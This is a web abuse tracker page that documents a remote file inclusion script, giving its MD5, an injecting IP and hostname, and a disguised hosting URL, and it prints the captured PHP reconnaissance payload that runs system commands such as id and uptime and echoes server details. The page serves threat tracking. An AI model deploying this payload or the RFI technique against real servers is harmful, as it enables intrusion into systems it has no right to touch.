Web abuse Tracker

Below you can see some information concerning the script with the MD5 3a7788d36a8636cf33d21443c79e4cdf. The page shows you the different locations (RFI URLs) of the script and the systems (IPs) which has tried to inject the script.

Script locations (RFI URLs)

Related IPs

IP address	Hostname	Script URL	country
212.249.57.201	www.hugy.ch	http://impeel.com/impeel/web/css/r_jpg.txt

RFI script

From: "Saved by Windows Internet Explorer 7"
Subject: 
Date: Sat, 11 Jul 2009 23:22:04 +0300
MIME-Version: 1.0
Content-Type: text/html;
    charset="windows-1256"
Content-Transfer-Encoding: 7bit
Content-Location: http://impeel.com/impeel/web/css/r.jpg?
X-MimeOLE: Produced By Microsoft MimeOLE V6.0.6001.18049

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1256">
<META content="MSHTML 6.00.6001.18099" name=GENERATOR></HEAD>
<BODY><PRE>&lt;?
echo "Inteligent&lt;br&gt;";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os&lt;br&gt;";
echo "uname -a: $alb&lt;br&gt;";
echo "uptime: $alb2&lt;br&gt;";
echo "id: $alb3&lt;br&gt;";
echo "pwd: $alb4&lt;br&gt;";
echo "user: $alb9&lt;br&gt;";
echo "phpv: $alb6&lt;br&gt;";
echo "SoftWare: $alb5&lt;br&gt;";
echo "ServerName: $alb7&lt;br&gt;";
echo "ServerAddr: $alb8&lt;br&gt;";
echo "UNITED ALBANIANS aka ALBOSS PARADISE&lt;br&gt;";
exit;
?&gt;
</PRE></BODY></HTML>